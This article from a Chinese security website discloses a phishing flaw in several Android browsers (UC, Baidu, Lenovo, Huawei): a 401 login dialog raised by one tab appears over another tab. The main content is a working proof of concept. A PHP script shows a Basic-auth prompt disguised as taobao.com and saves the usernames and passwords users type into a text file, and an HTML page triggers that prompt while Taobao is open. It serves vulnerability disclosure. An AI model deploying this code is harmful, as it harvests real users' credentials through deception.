频道栏目
首页 > 安全 > 系统安全 > 正文
多款手机浏览器跨域钓鱼漏洞(UC/百度/联想等)
2015-01-26 13:44:44         来源:爱梅小礼  
收藏   我要投稿

 

好吧,我先承认这不是真正意义上的跨域,但可以造成同样的效果。

测试了几款国产安卓浏览器,发现UC(最新版)、百度浏览器(最新版)、联想(vibe ui自带浏览器)、华为(3c自带浏览器)中存在该问题。其它浏览器未必不存在,只是对我这个exp不敏感罢了(要么弹不出新窗口,要么对401对话框不敏感)。

现在安卓浏览器都可以打开很多标签页,而且每个标签页之间都严格遵守同源策略,互不干扰。但有一种情况,当浏览器中同时存在两个已经打开的标签页时,并且用户正在浏览b标签,此时a标签弹出一个由js形成的浏览器对话框(例如alert、confirm、prompt以及401auth),如果这个窗体是全局的,那么这个窗体将会出现在b标签页的上方,如果又没有明确提示来源页的话,那么用户会误认为是b标签页弹出的信息,从而导致钓鱼或者欺骗。
 

下面就是利用该方式跨域淘宝进行401钓鱼的演示

auth.php

<?
if($_SERVER['PHP_AUTH_PW'] =="" || $_SERVER['PHP_AUTH_USER'] =="" )
{
header('WWW-Authenticate: Basic realm="-taobao.com                                                                                                                                                                                                                                             "');
header('HTTP/1.0 401 Unauthorized');
}
else{
$user = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
$fish = "username:".$user."  password:".$pass;
file_put_contents("pass.txt",$fish."\n",FILE_APPEND);//将密码保存在pass.txt里面
}
?>



index.html

<html>
<body>
请点击超链接:<a href="javascript:xx();" target="_blank" >淘宝</a>
<script>
function xx() {
window.open("https://www.taobao.com/");
setTimeout("document.location='./auth.php'",5000);//用户打开淘宝后,5秒钟内在淘宝页面弹出401对话框
}

</script>
</body>
</html>



下面欣赏一下这几个浏览器的对话框,最完美的就属UC和百度的了。

uc:

 

Screenshot_2014-12-17-00-11-10-266.jpeg



baidu:
 

QQ图片20141217005319.jpg



联想vibe ui自带浏览器,好歹有个来源页提示,不过很容易就能糊弄过去,因为没人记得住taobao的真实IP是多少:
 

Screenshot_2014-12-17-00-56-50-148.jpeg



华为的也差不多:
 

QQ图片20141217005207.jpg



输入密码之后,就会保存到pass.txt里啦:
 

QQ截图20141217010000.jpg


 

解决方案:

不要全局的框框

 

点击复制链接 与好友分享!回本站首页
相关TAG标签 漏洞 浏览器 手机
上一篇:小红伞(Avira)杀毒软件升级过程存在缺陷(可被中间人攻击利用植入木马)
下一篇:搜狗浏览器最新版本升级存在缺陷(可被中间人攻击利用植入木马)
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站